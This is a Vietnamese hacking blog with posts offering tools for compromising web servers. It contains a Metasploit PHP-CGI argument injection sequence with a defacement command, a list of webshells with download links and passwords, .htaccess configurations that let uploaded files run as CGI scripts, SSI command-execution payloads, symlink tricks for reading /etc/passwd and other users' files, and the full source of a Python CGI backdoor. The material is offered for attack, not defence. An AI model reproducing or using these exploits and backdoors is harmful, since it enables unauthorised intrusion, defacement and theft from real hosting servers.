Showing posts with label CGI. Show all posts
Showing posts with label CGI. Show all posts

Friday, September 14, 2012

http://www.mediafire.com/?subbod84wcgbbk3

use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.178.210
set TARGETURI /phpinfo.php
set PAYLOAD php/exec
set CMD echo \"owned\">/var/www/html/owned.html
exploit

Exploit php-CGI

By: MIN Software on: 8:43 PM

Thursday, June 28, 2012

Nói đến local là nói đến shell, không có shell thì chỉ local bằng niềm tin. Hôm nay soleil giới thiệu một số loại shell thông dụng không thể thiếu trong local attack.

Một số shell thông dụng:

r57.php
R57 hiện nay đang là shell thông dụng, được sử dụng phổ biến nhất với hầu như là đầy đủ các tính năng.

c99.php
Nói đến r57 cũng không thể  không nhắc đến c99 với các thao tác có sẵn trên shell mà không cần phải sử dụng lệnh: edit, del, insert, drop… đặc biệt là có khả năng dump cơ sở dữ liệu!


byg.php
Byg hiện đang là shell mà được soleil sử dụng nhiều nhất với các chức năng có sẵn và thao tác dễ sử dụng


pass login: byg
         
         vhb.php

     Con shell này đã được soleil Edit và Deveple bằng chính con shell Byg.php trên với 1 số tính năng mạnh hơn và giao diện đẹp, bắt mắt hơn. Đây là con shell chính mà soleil thường sử dụng nhất.
  
http://www.mediafire.com/?hr9acl1yd1eabcw 

    Pass login: vhb
soleil.pin
Nếu Server Safe_mod: ON,  cả shell r57 và c99 đều không có chức năng run command để thực thi các câu lệnh, vậy làm sao có thể local được. Giải pháp được nghĩ đến là sử dụng shell cgi mà chức năng chính của nó là thực thi các câu lệnh.
 Pass login: ducdung.08clc
Cách sử dụng:
-          Up shell soleil.pin và CHMOD nó về 755
-          Up hoặc tạo file .htaccess có nội dung:
## START ##
Options +ExecCGI
AddHandler cgi-script cgi pl cgi gmc pin jpg
RewriteEngine on
RewriteRule (.*)\.mil$ $1.cgi
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
RemoveHandler .hack
AddType text/plain .hack
## milw0rmvn exploit ##
Hoặc:
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .cin
AddHandler cgi-script .pin
AddHandler cgi-script .pin

telnet.php
Để sử dụng shell cgi được thuận tiên hơn, soleil giới thiệu shell telnet.pl. Chức năng hoàn toàn tương tự với con shell soleil.pin
Tuy nhiên cách thức sử dụng nó thì đơn giản hơn nhiều vì không phải sử dụng đến file .htaccess mà chỉ cần CHMOD nó về 755 là run ngon.

Fake symlink:

Get user:

Get user và domain
 
Shell này cần chmod về 755 trước khi sử dụng

Get all config
 
SSI
 
Backdoor.php
 
Netcut

zipcode.php
 
r57bypass.php (vip)
 
Check Shell : Kiểm tra shell có trên site
 
Priv8_2012.php
 
saoluu.php
Shell xml: Up shell đối với vbulletin
 
root.tar.gz: Dùng để symlink root hay indirect symlink.
* Và rất nhiều shell khác  với 1 số tính năng đặc biệt khác nữa.
...
Pass Unlock (all link): soleil_vhb
Nguồn: Hồ Đức Dũng's Blog
Hiệu chỉnh bởi Juno_okyo.

Tổng hợp Shell và giới thiệu tính năng!

By: MIN Software on: 6:51 PM

Sunday, April 1, 2012

Shell Cgi (cgi.x-zone) khi gỏ command nó sẽ mã hóa dòng lệnh ,có thể qua mặt vài server

telnet 1.4
bypass mod sec (base64)

Telnet 1.3
.htaccess
Options +FollowSymLinks +Indexes
DirectoryIndex default.html
## START ##
Options +ExecCGI
AddHandler cgi-script cgi pl tg love h4 tgb cbg

RewriteEngine on
RewriteRule (.*)\.war$ $1.cgi
## END ##
RemoveHandler .vkl
AddType application/octet-stream .vkl
~> 2 dòng cuối khi symljnk ghi vào file.vkl thì file này load trên trình duyệt sẽ tự download về

Admin Finder (tìm thư mục admin)


cmd.shtml > view source cmd.shtml

<!--#exec cmd="dir /home/victim/public_html/" -->
 cmd.shtml (1.txt là file đã được symljnk) > view source cmd.shtml

<!--#include virtual='1.txt'-->
Bypass ln.zip
<?php
chmod('ln',0777);
system('./ln -s /etc/passwd > 1.txt');
?>
hoặc
./ln -s /home/victim/public_html/index.php 1.txt
File SymLink.php
/home/victim/public_html/index.php
Find Path qua error-log : http://victim.com/fuck
tail -100 /var/log/httpd/domains/siteA.error.log | grep fuck
tail -100 /usr/local/apache/logs/error_log | grep fuck
 Shell offline.php?acc ~> get user admin ,nhiều chức năng ,ko bị lổi trên các server config kỉ

Backuper.php (Leech code)
Shell Unkonw (Brute)
Shell images (r57)
Shell images (Webadmin)
Shell Dumper.php (Zip + Restor data)
Shell images aaa.php.jpg - shell upload
Shell help.php (upload file + chmod)
Unzip.php (giải nén các file bị zip)
Con shell này tạo ra thêm 2 file để thực hiện zip
Nếu ko tạo đc 2 file này thì chúng ta sẽ tự tạo 2 file đó
telnet v1.3 (ko cần htaccess)
sym-pl.pl (symljnk cgi ko cần htaccess)
Shell Root ( thực thi các dòng lệnh sẽ show ra trình duyệt - chỉ sd 1 số sv)
Locus Shell (back connect)
perl shell mr.thien (BackConnect)
Mysqldumper.php (BackConnect)
5.2.9 (BYpass)
dot.pl (tim user+domain)
upload.phpl (upload len path)
shell.xml (prefix admincp)
shell ,tạo file symljnk đối với từng version php ,direct , h4ckcity.php
sql deface vbb,wp,mybb sql.php
html shell có thể view file bị permiss html.php

shell python.php (chức năng tạo shell cgi,py,bypass,sql wp& jomla,....)
hoặc
python.py
shell sec4ever .qua mặt anti với code hoàn toàn # c99 & r57
vault.php (editor,webshell,bind)
saudi.php (symljnk root ,brute,...)
sa2.0.php(resever,symljnk root,upload)
madspotshell.php(symlink tung user)
r57-vip.php symljnk

Tools Hacker

By: MIN Software on: 6:37 AM

Friday, March 30, 2012

  
#!/usr/bin/env python
# Info : Linux based CGI backdoor with python
# author: otoy
# date : 0x102010

import cgi,os,re,sys

form = cgi.FieldStorage()
cmd = form.getvalue('cmd', '')
osexe = os.popen(cmd)

dirt = os.getcwd()+'/'
prognm = sys.argv[0].strip()
progfl = re.findall(dirt+'(.*)',prognm)[0]

osinf = os.uname()
info='''====================================
CGI python backdoor
====================================
Author : otoy
Date : 0x102010
Blog : <a href="http://otoyrood.wordpress.com" target="_blank">otoyrood.wordpress.com</a>
====================================
System : %s %s
====================================
''' %(osinf[0], osinf[2])

print "Content-type: text/html"
print

print"""
<html>
<head>
<title>CGI python backdoor</title>
</head>
<body>
<pre>%s</pre>
<form action='%s'>
Command <input type='text' name='cmd' />
<input type='submit' />
</form>
<pre>%s</pre>
</body>
</html>
""" %(info,progfl,osexe.read())

CGI python backdoor

By: MIN Software on: 9:14 PM

 

Our Team Members

Copyright © hacker va bao mat | Designed by Templateism.com | WPResearcher.com